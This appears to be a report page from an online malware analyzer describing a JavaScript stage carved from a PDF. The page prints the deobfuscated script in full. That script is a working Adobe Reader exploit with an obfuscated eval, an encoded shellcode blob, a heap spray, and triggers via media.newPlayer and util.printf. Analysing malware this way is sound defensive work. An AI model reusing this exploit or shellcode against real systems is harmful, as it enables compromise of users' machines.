generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from decompressed stream at 0x18A at offset 0x18A 5305 bytes
SHA-256: a368c9c7c92054f296d745d890740a7fe8d615bfc6966f680711f3951aab24a3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
xxxxx=ev;yyyyy=al;zzzzz=xxxxxyyyyy;aaaaa=app;try{}catch(e){zzzzz=1;aaaaa=1;}try{d=nothis_nothis;zzzzz=1;aaaaa=1;}catch(e){}aaaaa[zzzzz](ddddddd=unescape;);try{adsfadsf=e2e2;ddddddd=1;}catch(e){}dxdxdx=aaaaa[zzzzz];this.zoom=this.zoom*1;varXfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL=ddddddd(ddddddd(%u4141%ue841%u0001%u0000%u8b00%u240c%uc483%u8d04%u1249%u8041%u6731%u3980%u7590%u0df7%u0f76%ucbaf%u6767%uaf0f%u67fb%u0f67%u7767%u6767%u470f%u67d0%u0f67%ucbbe%u6767%u670d%u9e0f%u6604%u3367%u0f9b%u55f4%uf383%ua30f%u78ea%u0f13%u51d5%u7468%u300f%u6a01%u0f98%u4836%u66c5%u5e0f%u1a85%u0fe4%u95e8%u067f%u240f%ucbd9%u0fbc%uc88a%ud398%uce0f%ufe45%u0fc6%u74e9%ucb6d%ufc0f%uece0%uec82%uea93%ub719%ubc54%u63d0%u844c%u5433%u03b5%u3dec%uec57%u6b2c%u2eec%uec7b%uec6e%u6f0e%u5aca%u55f4%uf383%u6712%uec07%u5b22%u2bec%u1f62%uaa64%u3eec%u6447%u54ba%u2098%u53ec%u64dc%ufe92%ud968%u5d61%u13a3%ua66f%u60ad%ub764%u8c21%u5c96%u4333%u127b%uec83%u433e%uba64%uec01%u1c5b%u3eec%u647b%u64ba%udc4b%u38f2%u30cc%u5a06%u55f4%uf383%uc912%u8be6%u6f67%u6767%u8bec%u20ec%ue49b%u62a7%u20ee%uec9b%u8b20%ua7e4%uee62%u8b20%u670d%u3098%u54b7%u54ae%ue7bc%u5d5f%u6612%u2624%u5be7%u5d6f%u9e12%ue424%u659c%u9412%u642e%ueea6%u67e2%u6766%u5467%u26ae%u5be7%u456f%u9e12%u63a1%u676f%u670d%ue70f%u6767%u0d67%u0d64%u0d67%u0f64%u6767%ue767%ud2ec%u6667%u6767%u8f31%u6767%u6767%ue43f%u6aa7%u3237%u8bec%u20ec%u989b%uee87%u5320%u0f32%u6667%u6767%u3098%uea8f%u67d2%u6766%u3167%u670d%u670d%u9832%ubf30%u670d%u670d%u650d%u670d%u670d%u670f%u6767%u3127%u678f%u6767%u3f67%ua7e4%u376a%uec32%uec8b%u9b20%u8798%u9fe4%u6867%u0be9%u6765%uee67%u67e2%u6761%uec67%u2338%u10ec%u0d53%u0d67%u3467%u9831%u8730%u38ec%ua02f%u63e2%u6761%u6767%u6763%u0d67%uea67%u67e2%u6760%u3767%u670f%u6763%uea67%u67e2%u6765%u3767%u10ec%u3153%u3098%uec93%u4aa4%u6367%u6767%u9fe4%u1867%uee61%u63fa%u6761%u5467%ueaae%u6ad3%u6567%u6767%u55cb%ua7a6%u64af%u9de0%udbea%u676a%u6765%ucd67%u9de0%u5c26%u63ea%u6761%u1267%u0db9%uea67%u63e2%u6760%u3767%ud298%u6163%u6767%ue2ea%u6567%u6767%u9837%u67d2%u6761%u9867%u9f30%u8ce6%u6367%u6767%u9ce4%u1867%u98e3%u67d2%u6761%u9867%u9730%u670d%ud2ea%u6667%u6767%u8f31%u6767%u6767%ue43f%u6aa7%u3237%u8bec%u20ec%u988b%u0d87%u0d67%u9867%u2b10%u1098%u9853%u8730%u670d%ue2ea%u6067%u6767%u9837%u3710%ue2ea%u6667%u6767%u9837%u5310%u3098%u5493%u27a7%u1be7%u6762%u1267%uec9f%u3728%u9ce0%u1bea%u6762%ud2ea%u6667%u6767%uc394%u9ce0%u670d%u670d%u650d%u670d%u670d%u670f%u6767%u3227%u678f%u6767%u3f67%ua7e4%u376a%uec32%uec8b%u9b20%u8798%u9fe4%u6867%u5be9%u6766%uee67%u67e2%u6761%uec67%u5b38%u10ec%u0d53%u0d67%u3467%u9831%u8730%u38ec%ua027%u63e2%u6761%u6767%u6763%u0d67%uea67%u67e2%u6760%u3767%u670f%u6763%uea67%u67e2%u6765%u3767%u9831%u9330%ua4ec%u674a%u6763%ue467%u679f%u6118%ufaee%u6163%u6767%u670d%ue2ea%u6063%u6767%u9837%u63d2%u6761%uea67%u67e2%u6765%u3767%ud298%u6167%u6767%u3098%ue69f%u678c%u6763%ue467%u679c%ucc18%ud298%u6167%u6767%u3098%uea97%u67d2%u6766%u0f67%u6667%u6767%u0d31%u9867%ubb30%ue2a1%u6798%u6767%u5445%u26ae%udbe7%u676a%u6766%u6767%u9212%ue3a0%u676a%u6766%u4567%u4847%ue414%u63a6%ua001%u6ae3%u6667%u6767%u4547%ua6e4%ue065%u549c%ueab5%u7213%ucb67%udbea%u676a%u6766%ucd67%u2526%u675b%u8a12%ua12e%u6ae3%u6667%u6767%ua045%u8ce2%u6767%u2467%u232a%ua049%u88e2%u6767%u2267%u223f%u0147%ue2a0%u6794%u6767%u0448%ue2a1%u6792%u6767%ua047%u91e2%u6767%u1367%u1406%ua00c%u9de2%u6767%u0b67%u140e%ua113%u99e2%u6767%u4167%u9ce0%ue2ea%u678c%u6767%u670d%u8f37%u6767%u6767%ue43f%u6aa7%u3237%u8bec%u20ec%u988b%u0d87%u0d67%u9898%u8330%uf7f7%uf7f7%uf7f7%u00f7%u0000));varIfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp=ddddddd(%u0a0a%u0a0a);varwuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn=ddddddd(ddddddd(%u0a0a%u0a0a%u0a0a%u0a0a%u0a0a%u0a0a%u0a0a%u0a0a%u4478%u4a75%u6457%u6865%u5846%u496b%u4d6b%u4373%u6756%u5a58%u575a%u7856%u4b54%u5858%u6543%u7474%u7273%u4153%u4b4e%u6e70%u516f%u4345%u7870%u624c%u7456%u6e72%u4743%u4b4d));this.zoom=this.zoom*1;lenlen=(0x400000/2);while(IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.length<=lenlen)IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp;dxdxdx(IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.substring(0,32768-XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL.length););muuuuu=newArray();this.zoom=this.zoom*1;lenlenlen=0x700;for(i=0;i<lenlenlen;i){muuuuu[i]=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlympXfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL;}util.printd(zhFvZPRxwrcXQJVFALoWckjIlrYaLBnwVTJw,newDate());varversion=app.viewerVersion.toString();if(version>=8.0){util.printd(UcDiTDslmSOGyIAvnrigdAPgAfIGJkTqHqZt,newDate());varxxx=ddddddd(this.   media.   newPlayer(null););try{dxdxdx(xxx);}catch(e){}util.printd(wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn,newDate());}if(version>=7.0&&version<8){varla=12999999999999999999;for(ii=0;ii<276;ii)la=8;varyyy=ddddddd(util.   printf("E000f",la););try{dxdxdx(yyy)}catch(e){}} endstreamendobjxref07000000000065535f000000001500000n000000010000000n000000029700000n000000014800000n000000020700000n000000035900000ntrailer<</Root10R/Size7>>startxref7016%%EOF

Open this report in the interactive analyzer, or submit your own file for analysis.